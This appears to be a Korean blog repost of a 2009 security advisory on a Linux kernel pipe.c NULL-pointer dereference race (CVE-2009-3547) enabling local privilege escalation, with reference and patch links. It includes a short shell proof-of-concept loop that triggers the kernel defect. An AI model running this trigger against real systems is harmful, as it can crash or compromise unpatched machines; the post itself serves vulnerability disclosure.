본문 바로가기
운영체제 (LNX,WIN)

Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability

by 날으는물고기 2009. 11. 4.

Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability

Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference.

Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.


Exploit:

The following proof of concept is available:

while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 # Trigger defect
done


References:


원문 : http://www.securityfocus.com


패치코드
http://xorl.wordpress.com/2009/11/03/cve-2009-3547-linux-kernel-pipe-null-pointer-dereference-race-condition/
728x90

댓글